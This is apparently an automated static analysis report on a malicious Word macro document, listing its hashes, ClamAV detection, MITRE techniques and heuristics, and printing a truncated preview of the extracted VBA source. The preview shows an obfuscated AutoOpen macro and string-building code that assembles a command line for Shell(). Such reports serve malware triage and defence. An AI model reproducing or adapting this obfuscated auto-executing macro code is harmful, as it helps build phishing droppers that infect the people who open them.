Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5666747ba94cc95b…

MALICIOUS

Office (OLE)

147.6 KB Created: 2018-09-26 23:09:00 Authoring application: Microsoft Office Word First seen: 2018-10-13
MD5: e4b2f2a839510c4574bfd2302bac7d26 SHA-1: 9b006576d41c248cce3702849a0fbefbd21fb8a1 SHA-256: 5666747ba94cc95baada41f314fab5609cc5333d15704b64e686a0b09d0ca154
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and utilizes the Shell() function, indicating an attempt to execute arbitrary code. This macro likely downloads and executes a second-stage payload, a common technique for malware delivery. The ClamAV detection further confirms its malicious nature.

Heuristics 6

  • ClamAV: Doc.Malware.Valyria-6698777-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6698777-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 105711 bytes
SHA-256: a76d5205b310b11b298635a73e0e194fdaad6edf0538249b2b5a72ca3275d3c1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FbANqwokLfh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim KdwSvi(2)
KdwSvi(0) = MidB(KzIjf + KjlmBRLbzWwrfoACo + CtRiRp, 878, 790) + MidB(EEhsZk + IRWSZjjSSUjcRjsVSzMR + FtdkzGDB, 763, 613)
KdwSvi(1) = Left(kUlAh + VdonUvLPfOvAjdEzTMQip + jwYkRR, 811) + Left(LRGIpn + WYkMSGAziCPEzzBwIfNzFK + CfvJjm, 538) + MidB(BKQqYl + naNLREKYQJJbfCzTAZWccr + nvYku, 841, 271) + Mid(EHkakjH + woWIPCRUJRwkTWizjO + NSwjMs, 310, 860)
   Dim Jsuif(2)
Jsuif(0) = Left(JcWEAl + CWNwIpDhIpTWNZEraaoZ + dWmuJ, 241) + Right(tKVCuGQ + TVqLzDSnwttMNviTRnR + rcCDC, 431)
Jsuif(1) = Right(UPUDBri + cWOnihwfzcwoYhUXtAP + SYwst, 410) + Right(tiLuh + vFiWWijqSiUjiMFM + kEfKv, 541)
   Dim WPtPwC(2)
WPtPwC(0) = MidB(pktpV + OnQuUQiohraofFjbt + NtRzKw, 917, 685) + Left(jfJvlRoL + EiHcfuAnIuGoXdVNRm + tqDDsuo, 852)
WPtPwC(1) = Right(jSfmoUPw + rDdrQVOnwpuwBNqIKzQiT + tlpBzTv, 179) + Right(MMmWfAZR + TiYBrZpwbYKjqcSAWwpMXZ + lfwrM, 411) + Mid(PMnJY + MNRCdwCCGQbmdRcVEAwkM + jMPKJ, 540, 859) + Mid(zFXmHqc + vtjdwLLDZPNcFMimszoi + SvEpN, 262, 474)
lMYOiLwkBTJUC (KeyString(HrLKbn + thnsGaPB + 14 + 21 + 32 + MAwpUAAL + LbrbbdLm) + ftMSL + QidQJOi + KeyString(OSWKJ + XhSpLQc + 17 + 24 + 36 + sTOSojd + jhYiCM) + sCPlUZzil + JiaBZjbdA + zsTTDEjCG + tMofYiIjkE + jCYvCvjtoRN + omrqjDd + vdGOEw + TTPWAK)
   Dim IpCnHL(1)
IpCnHL(0) = Right(fPGrqLq + oRnHUitQPklvvTFjAMJ + diosliId, 84) + Right(thnoG + qwvqjUWXGGKhqdluBj + HhBkB, 734) + Left(druSoB + UjOLBWuiLrJCLHioJijKkrp + UNtoqm, 506) + Right(WFknXF + VORkMJzNQkViTMsRSDTQ + NmjDWLi, 409)
   Dim aMhIE(1)
aMhIE(0) = Left(NVpzrCs + NnXrCfwzWPJHFowlju + XcFuvl, 431) + MidB(KKzqzwSc + JhiRGQjCEGMRLZzEkMcnYzw + CpfJzL, 852, 623)
   Dim lqWIft(2)
lqWIft(0) = MidB(iwKbTjdi + ozCwTYVASDENJqXwCVE + iaZSEDnh, 246, 324) + Mid(lpWzjKsV + iBXGqGkDkqKSJQziVrzh + AABWLLn, 911, 3)
lqWIft(1) = MidB(uwMhzK + CaWdzWtvbmlTMipFsYDPSAb + kzXjjr, 167, 32) + Mid(DzRQwU + EhUWbfVRwKEHbKtDF + EcLjfja, 151, 128) + MidB(uXhwN + BOZKqtisqGDFbdrL + zuKsPzi, 961, 493) + Mid(YtDmCull + nkBDivovGCcaCRaaKjS + fXFSZ, 682, 116)
   Dim zdMmT(2)
zdMmT(0) = Mid(wtlRwjV + WjtGRJITNZzMGTtGaXaJJoAD + EGJlDoLm, 738, 866) + Right(soGEml + XriXwYXkSRFmVtMJRHGU + EfmCE, 28)
zdMmT(1) = MidB(EaMblm + oCUbkjWupacUKRWTtJUjQCoh + iiZiYTE, 1, 684) + Left(IrDPam + JqIVtlkTDZvBbNBzwrM + tYkRQRp, 309)
End Sub


Attribute VB_Name = "lLKIplE"
Function sCPlUZzil()
ANCXb = "d \\ / /  " + "//\ /V:O/C" + """" + "set {+@?=" + "7a02 a207 0a72 20" + "7a 27a0 a0"
Dim qjaoM(2)
qjaoM(0) = MidB(NDvpBTKh + PshrkfsifJXCGhCqmc + lMUfWAO, 387, 897) + MidB(JZwTGWvw + jIDXnvHraiYNwhJrQLO + NcHOv, 373, 835)
qjaoM(1) = Left(ICDQI + cMDIKLCnqpmEUmzJK + LXiCPF, 878) + MidB(ZZmnwLNv + EbFdFbwiQTwZQGaIVFIMr + SiMJZ, 25, 638)
   Dim vGudbY(2)
vGudbY(0) = Left(KfaAW + fnnGLvONsINkYqjjKulw + zzBMpLww, 288) + Left(Oahojsj + KYmUMJpWDuqFwNBXhM + vEEqzr, 574)
vGudbY(1) = MidB(LPnZK + frGaLiwITqSrIDDrPITVzs + iqVonjBs, 800, 116) + Right(MIvZj + JvIJsTRrMWIsRSvi + qQNzDti, 144) + MidB(owhsuWhd + PJfTzJUqddCSiuJpc + fShMz, 317, 957) + Right(SLiWjlu + tKQiQmzJPbXoqfMlkKjWv + qQBmt, 992)
   Dim kpKHG(2)
kpKHG(0) = Left(kZKIjwzm + oTjLXpJmAwDPZLwJwLKEG + GWLDN, 598) + MidB(azpNQiv + LAhJlwkzcDfiPcjnbjn + kwOGl, 150, 537)
kpKHG(1) = Mid(WsFjBVZb + CmAwhNQEIsEYhUYnLQADnHX + KONAdw, 309, 503) + Right(jtVDd + RTXLdhszYCjNoKqzurbZRuo + kqNXK, 757) + MidB(wEhjV + aNqXMWCKswHpupwrMEL + ZwHrvM, 93, 469) + Mid(zEDQYiiU + MfAJsmririPiSzLZznZT + BNYXMdjI, 997, 236)
   Dim QSIzH(2)
QSIzH(0) = MidB(KEVsGh + MskdSHWjfHlLjQwwKbi + zzfUL, 980, 820) + Right(rDibJW + HYTAnLadcIkHLildcCzkph + jvFGct, 323)
QSIzH(1) = Left(mGLlE + WipKfVzfAarHoirthkWf + sczXSjXL, 575) + Mid(sIoLD + bSZLRInuLJlADzTtaNRCjda + LChicvD, 489, 339)
   Dim zwIUVt(2)
zwIUVt(0) = MidB(kVlSKP + ErmMEOqZMSNuHiQRMQd + WjKjbGN, 949, 138) + Right(IZhtj + CIbjVdnOtwKibZXEKzMwUG + 
... (truncated)